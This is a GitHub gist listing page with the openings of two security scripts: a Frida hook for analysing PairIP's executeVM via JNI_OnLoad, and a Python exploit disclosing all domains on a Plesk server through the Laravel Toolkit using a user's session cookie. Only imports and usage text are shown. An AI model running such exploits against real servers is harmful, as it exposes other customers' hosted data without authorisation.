Skip to content

Instantly share code, notes, and snippets.

View Ahmeth4n's full-sized avatar
🏠
Working from home

Ahmethan G. Ahmeth4n

🏠
Working from home
View GitHub Profile
@Ahmeth4n
Ahmeth4n / pairip_analysis.js
Created March 2, 2025 20:44
simple PairIP executeVM() analyzer frida script.
function hookNative() {
const jniOnLoad = moduleHandle.findExportByName("JNI_OnLoad");
if (!jniOnLoad) {
console.log("[-] JNI_OnLoad not found!");
return;
}
console.log("[+] JNI_OnLoad founded:", jniOnLoad);
@Ahmeth4n
Ahmeth4n / plesk_laravel_toolkit.py
Created May 16, 2022 20:12
Plesk Laravel Toolkit - Disclosure of All Domains on the Server
import requests
import sys
import json
import re
# Plesk Laravel Toolkit - Disclosure of All Domains on the Server
if len(sys.argv) < 5:
print("\n" + " usage: python "+sys.argv[0]+" test.com 500 YOUR_AUTH_COOKIE output.txt")
print('\n [!] Paste the "PLESKSESSID_INSECURE" cookie value of the logged in user into YOUR_AUTH_COOKIE.')